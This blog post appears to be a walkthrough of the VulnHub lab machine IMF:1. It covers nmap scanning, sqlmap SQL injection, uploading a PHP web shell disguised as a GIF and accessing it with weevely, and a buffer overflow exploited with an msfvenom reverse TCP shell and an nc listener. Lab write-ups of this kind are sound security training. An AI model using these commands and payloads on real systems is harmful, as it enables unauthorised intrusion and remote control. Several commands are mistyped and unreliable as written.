IMF:1 VulnHub Walkthrough

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Hello Everyone, In this blog I am going to post walkthrough of imf 1.

This machine is a perfect example of buffer overflow.

You can download the machine from this link: https://www.vulnhub.com/entry/imf-1,162/

Let’s Start,

Target IP- 192.168.75.139

Attacker IP-192.168.75.175

Let’s start with nmap

nmap -Pn -sV 192.168.75.139

Ok, There is one port open

80-http

Let’s see what is running on port 80

So, now we check the source page

So, now we got our first flag :1

Now I use the decoder option in burpsuite to decode the flag

I got allthefiles

On closely looking the source in contact.php we found another hash

Again we used the decoder of burp and found our next flag :2

On again decoding the hash we found /imfadministrator

On checking the /allthefiles nothing show up

But when I tried with /imfadministrator , bingo I got the result that was the login and password 

Then on checking the source page I found that it might be vulnerable to sql injection

So I used burp suite to exploit it

I set the payloads and did the attack but nothing came up. It was showing INVALID USER

So on further enumeration , I found that there were 3 usernames

So, on testing it was rmichaels I got the 3rd flag successfully

On decoding the hash, it got continue to cms

So on entering with cms.php I got access to main site

Now on running the sqlmap we got the databases

Sqlmap -r sqli2 –risk=3 –level=5 –dbs –dump –batch –threads=10

We got 4 databases

In the tutorials-incomplete we found a source =”./images/whiteborard.jpg “

On trying it we got an image

Then we can see there I a qr code on decoding it we got our next flag :4

On further decoding of the hash of flag4 we got upload942.php

On entering it we got a page with upload

Now I uploaded a php file to get the shell access

But it seems that php is filtered

So I tried to upload the malicious code with gif and boom it was a success So on checking the source page I found something interesting

Acutually it was the same file(gif) that we uploaded but the server changed its name to eb7e25c6b97d

So now we used weevely to get the limited shell

Weevely http:/192.168.75.139/imfadministrator/uploads/ eb7e25c6b97d.gif test

And we got the limited shell

On doing ls we got our next flag :5

On decrypting it we got  agentservices

On finding the name agent we got the file

Find  /- name  agent &> dev/null

Usr/local/bin/agent

On entering it we got the Imf system and it was asking for the agent id that we don’t have

On reading it and listing (ls) we got access codes

On reading the file access code and reading the services we found that port

7788 is also open that we were not able to find during normal nmap

So, we got 3 ports so I tried to knock them so that we could find something useful. 

So now we can see port 7788 is also open

So now I used a tool retdec .It is a basically a decompiler. So that we can decompile the imf system to retdec

You can download retdec from this link : https://github.com/avast/retdec

So now to do that I used /usr/local/bin/agent /root/retdec/bin/agent So it will decompile the imf system to the retdec

So as you can see we have got the /root/retdec/bin that contains the imf system

So, on executing the decomplier.py file we got the user agent

0x2ddd984 ,On echoing it  echo $((0x2ddd984) I got the agent id:48093572

Now we chmod the agent to give  it the permission

Now as we enter option 3 we see that it records data that is input so as I tried to fuzz with ‘A’ I found a buffer overflow vulnerability in it .

So, as done in buffer overflow I created a pattern offset Locate pattern_create

/usr/share/metaslpoit-framework/tools/exploit/pattern_create.rb -l 200

So I used the gdb immunity debugger that is inbuilt in kali

Just write gdb agent

Now on entering the option 3 we enter the pattern that we created

And found that exact offset at a particular value :41366641

So now we created pattern with the same value

Now using msfvenom I created a reverse shell and removed the bad characters ( “\x00\x0a\xod” ).

Msfvenom -p linux/x86/shell_reverse_tcp LHOST=ip of kali LPORT=4448 -f python -b “\x00\x0a\xod”

So I copied this shell into the file that I downloaded online , and changed my ip and port (just google imf reverse shell )

Now on opening the listener usning nc -nlvp 4448

And running the python file : python agentsploit.py ip port.

We got the root access !!

Writer: Shubhankar is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top